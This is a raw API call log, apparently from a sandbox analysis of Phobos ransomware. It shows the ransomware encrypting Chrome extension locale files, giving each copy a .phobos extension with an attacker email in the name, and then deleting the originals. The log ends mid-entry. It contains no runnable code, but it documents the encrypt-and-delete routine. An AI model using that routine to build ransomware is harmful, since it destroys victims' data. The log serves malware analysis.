GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16370) returned 1 [0164.094] CloseHandle (hObject=0x134) returned 1 [0164.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json")) returned 0x2020 [0164.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.094] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.094] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.094] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.095] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.095] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3ff2, lpOverlapped=0x0) returned 1 [0164.099] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4000, dwBufLen=0x4000 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4000) returned 1 [0164.100] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4000, lpOverlapped=0x0) returned 1 [0164.101] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0164.101] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.101] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.101] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.101] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.101] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.101] CloseHandle (hObject=0x134) returned 1 [0164.101] CloseHandle (hObject=0x17c) returned 1 [0164.101] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json")) returned 1 [0164.102] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.103] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16596) returned 1 [0164.103] CloseHandle (hObject=0x17c) returned 1 [0164.103] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json")) returned 0x2020 [0164.103] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.103] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.104] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.104] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.104] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.104] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x40d4, lpOverlapped=0x0) returned 1 [0164.214] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40e0, dwBufLen=0x40e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40e0) returned 1 [0164.214] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x40e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x40e0, lpOverlapped=0x0) returned 1 [0164.215] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0164.215] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.215] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.215] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.215] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.215] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.215] CloseHandle (hObject=0x17c) returned 1 [0164.215] CloseHandle (hObject=0x134) returned 1 [0164.215] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json")) returned 1 [0164.216] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.217] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=15965) returned 1 [0164.217] CloseHandle (hObject=0x134) returned 1 [0164.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json")) returned 0x2020 [0164.217] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.217] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.217] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.218] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.218] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3e5d, lpOverlapped=0x0) returned 1 [0164.235] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3e60, dwBufLen=0x3e60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3e60) returned 1 [0164.236] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3e60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3e60, lpOverlapped=0x0) returned 1 [0164.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0164.238] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.238] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.238] CryptDestroyKey (hKey=0xa32da8) returned 1 [0164.238] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.238] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.238] CloseHandle (hObject=0x134) returned 1 [0164.238] CloseHandle (hObject=0x17c) returned 1 [0164.238] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json")) returned 1 [0164.239] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.240] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=17530) returned 1 [0164.240] CloseHandle (hObject=0x17c) returned 1 [0164.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json")) returned 0x2020 [0164.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.241] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.241] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.241] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.241] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x447a, lpOverlapped=0x0) returned 1 [0164.285] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4480, dwBufLen=0x4480 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4480) returned 1 [0164.285] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4480, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4480, lpOverlapped=0x0) returned 1 [0164.287] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0164.287] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.287] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.287] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.287] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.287] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.287] CloseHandle (hObject=0x17c) returned 1 [0164.287] CloseHandle (hObject=0x134) returned 1 [0164.287] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json")) returned 1 [0164.289] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.289] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16442) returned 1 [0164.289] CloseHandle (hObject=0x134) returned 1 [0164.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json")) returned 0x2020 [0164.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: 